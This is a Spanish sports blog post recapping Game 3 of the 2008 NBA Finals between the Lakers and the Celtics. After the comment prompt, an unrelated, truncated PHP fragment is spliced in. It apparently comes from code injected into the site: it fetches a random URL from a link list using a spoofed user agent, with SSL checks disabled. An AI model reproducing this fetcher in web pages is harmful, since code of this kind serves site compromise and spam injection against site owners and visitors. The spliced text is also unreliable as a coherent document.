Los ricos también sudan (BOS 81 – LAL 87)

11 de June de 2008 por TheDeerHunter

Atisbo de reacción en el Staples, en un partido muy por debajo del nivel que se les presupone a estos dos legendarios finalistas. Muchos esperaban para este 3er partido señales claras de alguno de los dos contendientes, sobre todo de los Lakers y de sus estrellas, en plan reivindicación de lo que hasta la fecha habían sido actuaciones mediocres… o también de los Celtics que habían declarado abiertamente su intención de matar la final a su favor por la vía rápida.

Sin embargo, tal y como se puso el balón en el aire, las expectativas fueron disminuyendo de escala. Los Lakers comenzaron tratando decididamente de imponer el ritmo, pero se les notaba nerviosos y precipitados. Los Celtics, en cambio, no notaban la presión de tal forma que sus grandes estrellas parecían un poco descolocados e incluso dormidos, al estilo de lo que les ha sucedido fuera del Garden durante prácticamente toda la postemporada. Al cocktail se sumaron los árbitros, mutando nuevamente el criterio arbitral con su reprobable tónica habitual y poniendo en problemas de faltas simultáneamente a ambos equipos. Mención aparte para Odom y Radmanovic, con 2 y 3 faltas respectivamente, alguna de ellas absurda, apenas iniciado el momento decisivo… Sobran los calificativos.

De esta manera apareció el escenario deseado por los Celtics, Kobe contra el mundo, pero con el factor inesperado para ellos de que en frente suyo no había nadie que apareciera. El reciente “Big Three” de Boston deshonraba su heredado nombre y se mostraba totalmente inoperante, ayudados también por la intención de Kobe de forzar faltas hasta sacarles del partido. Por desgracia para él, tampoco tuvo precísamente plácida una noche placida en este aspecto. Será la falta de práctica. Así, en un bosque de desaciertos, Lakers y Celtics firmaban tablas en el primer cuarto con sólo Kobe tirando del carro amarillo y Allen&Rondo echándole coraje en el bando verde.

Entonces, mostrando la casta y el acierto de una estrella de la liga, apareció Vujacic. Con su ayuda y la de sus rivales, Kobe encontró su momento dulce y pareció que podían encauzar el choque. La reacción de los verdes se hacía esperar y sólo los aciertos de Allen y los despropósitos locales mantenían al equipo en la pomada. Ante tal desbarajuste, Boston buscó ralentizar el ritmo hasta el sopor agazapados esperando su oportunidad y sin saber cómo los Lakers se dejaron contagiar por esa atmósfera.

De repente, todos se teletransportaron a la temporada regular. Ya no estábamos en el 3er cuarto de un partido decisivo para el título, estábamos en medio de un partido en el que nadie se jugaba nada, todos mostrando una indolencia escandalosa tanto en defensa como en ataque que el ojo experto hubiera diagnosticado de extremo cansancio físico y psíquico, además de la tensión al límite. En ese momento los Lakers estaban K.O: Gasol muerto, Odom&Radma quién sabe dónde, Kobe superado por la tensión y el esfuerzo lanzaba un tiro libre ¡y se quedaba corto!. Celtics trató de rematar pero tampoco le sobraban las fuerzas. Pierce cada cosa que hacía era cagada y/o falta y para colmo Rondo se hizo daño en el tobillo (algunos ya querían compararlo al héroe del primer día) con lo que la dirección verde se resintió. Ni super-Powe llegó a mostrarse. Sólo Allen estaba en el partido y agarrados a él se pusieron por delante a finales del 3º. Más silencio que el habitual si cabe entre los aficionados locales…

En los albores de la tragedia, Kobe y los suyos sacaron fuerzas de donde no las había. Vujacic reapareció con una entereza casi sobrenatural. Los nervios, que por fin agarrotaron a los Celtics, unidos al cansancio y al desacierto que arrastraban terminó por ponerles la puntilla. Incluso Gasol tuvo la suerte de encontrarse en los lugares justos en los momentos precisos para aportar canastas decisivas. Fue, sin duda, su peor partido con la camiseta amarilla. Boston se vino abajo y sus últimos minutos, con el partido en liza, fue un compendio de desacierto tras desacierto. Kobe tan solo terminó de rematarlos.

Los Lakers dan un primer paso de una forma poco convincente lo que supone un arma de doble filo. Por un lado rompen, no olvidemos, una larga racha de derrotas consecutivas contra los Celtics, lo que debería implicar una cierta inyección de confianza y una disminución de ansiedad. Por otro lado, lo logran sin trasmitir apenas nada, con la sensación de que un horripilante Boston ha estado a punto de vencerles en su “inexpugnable” casa y que lo hará, sin duda, a poco que mejore. La cuestión es, ¿se trata de una cuestión de margen de mejora o de margen de retroceso?

Lo indudable es que harán bien ambos en dejarse la vida el próximo partido… y que nosotros lo veamos.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>